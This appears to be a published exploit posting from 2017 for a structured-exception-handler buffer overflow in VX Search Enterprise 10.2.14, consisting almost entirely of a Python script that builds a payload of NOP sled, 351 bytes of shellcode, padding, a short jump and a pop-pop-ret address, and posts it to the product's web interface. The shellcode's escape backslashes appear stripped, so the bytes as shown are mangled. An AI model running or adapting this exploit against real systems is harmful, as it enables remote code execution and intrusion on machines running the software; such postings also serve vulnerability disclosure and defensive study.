VX Search Enterprise 10.2.14 Buffer Overflow
Posted on 07 December 2017
#!/usr/bin/python print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) *** " # Exploit Title : VX Search Enterprise v10.2.14 Buffer Overflow (SEH) # Discovery by : W01fier00t # Twitter : @wolfieroot # Discovery Date : 22/11/2017 # Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe # Tested Version : 10.2.14 # Tested on OS : Windows 7 Home Edition sp1 # You will need to enable web server for this to work. # You will also need the Login to VX Search wepage, for this to work. import urllib import urllib2 import socket #Bad chars x00x0ax0d #Payload size: 351 bytes shellcode = ( "xddxc6xb8x4axecxd2xeaxd9x74x24xf4x5dx2bxc9xb1" "x52x83xc5x04x31x45x13x03x0fxffx30x1fx73x17x36" "xe0x8bxe8x57x68x6exd9x57x0exfbx4ax68x44xa9x66" "x03x08x59xfcx61x85x6exb5xccxf3x41x46x7cxc7xc0" "xc4x7fx14x22xf4x4fx69x23x31xadx80x71xeaxb9x37" "x65x9fxf4x8bx0exd3x19x8cxf3xa4x18xbdxa2xbfx42" "x1dx45x13xffx14x5dx70x3axeexd6x42xb0xf1x3ex9b" "x39x5dx7fx13xc8x9fxb8x94x33xeaxb0xe6xcexedx07" "x94x14x7bx93x3exdexdbx7fxbex33xbdxf4xccxf8xc9" "x52xd1xffx1exe9xedx74xa1x3dx64xcex86x99x2cx94" "xa7xb8x88x7bxd7xdax72x23x7dx91x9fx30x0cxf8xf7" "xf5x3dx02x08x92x36x71x3ax3dxedx1dx76xb6x2bxda" "x79xedx8cx74x84x0exedx5dx43x5axbdxf5x62xe3x56" "x05x8ax36xf8x55x24xe9xb9x05x84x59x52x4fx0bx85" "x42x70xc1xaexe9x8bx82x10x45x93x4axf9x94x93x74" "x98x11x75xe2x4ax74x2ex9bxf3xddxa4x3axfbxcbxc1" "x7dx77xf8x36x33x70x75x24xa4x70xc0x16x63x8exfe" "x3exefx1dx65xbex66x3ex32xe9x2fxf0x4bx7fxc2xab" "xe5x9dx1fx2dxcdx25xc4x8exd0xa4x89xabxf6xb6x57" "x33xb3xe2x07x62x6dx5cxeexdcxdfx36xb8xb3x89xde" "x3dxf8x09x98x41xd5xffx44xf3x80xb9x7bx3cx45x4e" "x04x20xf5xb1xdfxe0x05xf8x7dx40x8exa5x14xd0xd3" "x55xc3x17xeaxd5xe1xe7x09xc5x80xe2x56x41x79x9f" "xc7x24x7dx0cxe7x6c") #0x1001a136 : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [libspp.dll] cmdname = "x90" *16 cmdname += shellcode cmdname += "A" * 157 cmdname += "xEBx06" cmdname += "B" *2 cmdname += "x36xa1x01x10" print " [*] Sending payload!..." url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110' values = {'command_name' : cmdname} data = urllib.urlencode(values) req = urllib2.Request(url, data) try: response = urllib2.urlopen(req, timeout = 1) except socket.timeout: pass print " [*] DONE! :D "
